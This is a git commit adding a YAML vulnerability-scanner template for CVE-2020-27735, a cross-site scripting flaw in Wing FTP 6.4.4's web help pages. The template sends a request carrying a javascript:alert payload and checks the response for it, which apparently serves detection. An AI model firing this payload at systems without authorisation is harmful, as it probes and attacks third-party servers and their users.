Create CVE-2020-27735.yaml

patch-1
PikPikcU 2021-07-27 10:23:23 +07:00 committed by GitHub
parent bc1e2b84cc
commit f619caf26a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: CVE-2020-27735
info:
name: Wing FTP's Web Interface XSS
author: pikpikcu
severity: medium
description: |
An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735
tags: cve,cve2020,xss,wing-ftp
requests:
- method: GET
path:
- "{{BaseURL}}/help/english/index.html?javascript:alert('{{randstr}}')"
matchers-condition: and
matchers:
- type: word
words:
- "alert('{{randstr}}')"
part: body
- type: status
status:
- 200